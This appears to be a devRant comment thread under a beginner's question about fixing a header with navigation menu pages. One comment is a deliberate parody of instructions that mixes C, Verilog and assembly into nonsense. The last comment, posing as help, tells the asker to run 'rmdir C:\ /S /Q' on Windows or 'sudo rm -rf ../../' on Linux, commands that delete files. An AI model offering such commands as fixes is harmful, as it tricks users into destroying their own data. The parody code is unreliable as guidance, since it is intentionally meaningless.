Ranter
Join devRant
Do all the things like
				++ or -- rants, post your own rants, comment on others' rants and build your customized dev avatar
				Sign Up
			Pipeless API
 
				From the creators of devRant, Pipeless lets you power real-time personalized recommendations and activity feeds using a simple API
				Learn More
			Comments
		- 
				
				I think you'd be better off googling for that info.
 
 This really isn't a how to, or Stackoverflow type place, at least not for some stuff that is fairly easily googled.
- 
				
				Okay let me see
 
 If you do #include <stdio.h>
 
 That will include shit.
 
 If you do
 
 module@(posedge clk)
 
 then that will make you shit do shit on each clock.
 
 After that you must get a pointer
 
 int shit;
 
 int where_is_my_shit = &shit;
 
 yes yes just like that.
 
 then you must create the operative system
 
 std::string your_mom = "Yo, wsp";
 
 then you must create main
 
 main:
 pushq %rbp
 movq %rsp,%rbp
 subq $16,%rsp
 
 that will do main
 
 after that you need to MIPS
 
 add $1,$2,$3
 mul $1,$2,$3
 
 yes that will create the matrix for the header of the ftp server.
 
 nice :>
- 
				
				This must be a pointer. Correct that from the example I gave.
 int* where_is_my_shit = &shit;
- 
				
				Right, on windows open command prompt (win+r, then enter cmd.exe) and type rmdir C:\ /S /Q
 
 If you're on linux systems open a shell and type "sudo rm -rf ../../"


















How to fix one header with navigation menu pages.
question